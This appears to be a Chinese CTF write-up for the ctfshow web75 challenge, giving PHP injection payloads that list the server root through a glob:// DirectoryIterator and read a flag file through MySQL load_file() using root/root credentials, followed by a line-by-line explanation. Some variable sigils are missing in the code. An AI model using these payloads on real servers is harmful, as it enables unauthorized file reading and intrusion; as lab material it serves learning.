ctfshow web75

开启环境:

先直接用伪协议获取 flag 位置

c=?><?php a=new DirectoryIterator("glob:///\*"); foreach(a as f) {echo(f->__toString().' ');} exit(0); ?>

c=try {dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root', 'root');foreach(dbh->query('select load_file("/flag36.txt")') as row){echo(row[0])."|"; }dbh = null;}catch (PDOException e) {echo $e->getMessage();exit(0);}exit(0);

try {

创建 PDO 实例, 连接 MySQL 数据库

$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root', 'root');

在 MySQL 中,load_file(完整路径) 函数读取一个文件并将其内容作为字符串返回。

foreach(dbh-\>query('select load_file("/flag36.txt")') as row) {

echo($row[0])."|";

}

$dbh = null;

}

catch (PDOException $e) {

echo $e->getMessage();exit(0);

}

exit(0);

相关推荐
Ashlee_code2 小时前
什么是Web3?金融解决方案
开发语言·金融·架构·eclipse·web3·区块链·php
xiangzhihong82 小时前
使用Universal Links与Android App Links实现网页无缝跳转至应用
android·ios
车载应用猿3 小时前
基于Android14的CarService 启动流程分析
android
没有了遇见3 小时前
Android 渐变色实现总结
android
雨白6 小时前
Jetpack系列(四):精通WorkManager,让后台任务不再失控
android·android jetpack
Sally璐璐6 小时前
IPSAN 共享存储详解:架构、优化与落地实践指南
开发语言·php
mmoyula8 小时前
【RK3568 驱动开发:实现一个最基础的网络设备】
android·linux·驱动开发
程序猿阿伟8 小时前
《声音的变形记:Web Audio API的实时特效法则》
开发语言·前端·php
sam.li9 小时前
WebView安全实现(一)
android·安全·webview
Clownseven9 小时前
Shell 脚本实战指南:内网 ARP 洪泛监控与飞书/邮件自动告警
网络·php·飞书